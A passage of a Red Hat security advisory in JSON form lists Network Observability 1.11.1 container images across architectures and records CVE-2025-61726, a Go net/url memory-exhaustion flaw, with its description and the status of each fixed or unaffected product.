],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3Aa72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773997913"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3A880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774887582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256%3Aa90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1773992622"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431392"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774431617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x",
"product_id": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256%3Adc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453?arch=s390x\u0026repository_url=registry.redhat.io/network-observability\u0026tag=1774859742"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64 as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x as a component of Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
},
"product_reference": "registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x",
"relates_to_product_reference": "Network Observability (NETOBSERV) 1.11.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"known_not_affected": [
